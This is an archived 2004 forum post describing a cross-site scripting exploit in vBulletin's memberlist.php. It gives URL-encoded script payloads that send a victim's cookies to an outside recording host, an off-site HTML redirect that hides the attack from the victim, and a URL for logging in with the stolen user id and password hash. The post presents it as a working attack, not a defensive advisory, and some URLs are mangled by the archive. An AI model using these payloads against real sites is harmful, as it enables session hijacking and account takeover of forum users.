spyshow 0 Report post Posted September 26, 2004 Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example: http://forums.xisto.com/no_longer_exists/ http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord% 2Ephp%3Fcook%3D%27%2B escape%28document%2Ecookie%29%3C%2Fscript%3E (NOTE: The URL should be on a one line) You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file: <script> location = "http://forums.xisto.com/no_longer_exists/ %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco rd%2Ephp%3Fcook%3D%27 %2Bescape%28document%2Ecookie%29%3C%2Fscript%3E" </script> And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to http://forums.xisto.com/no_longer_exists/. With the recorded user id and password hash, we can access the site: http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash] Share this post Link to post Share on other sites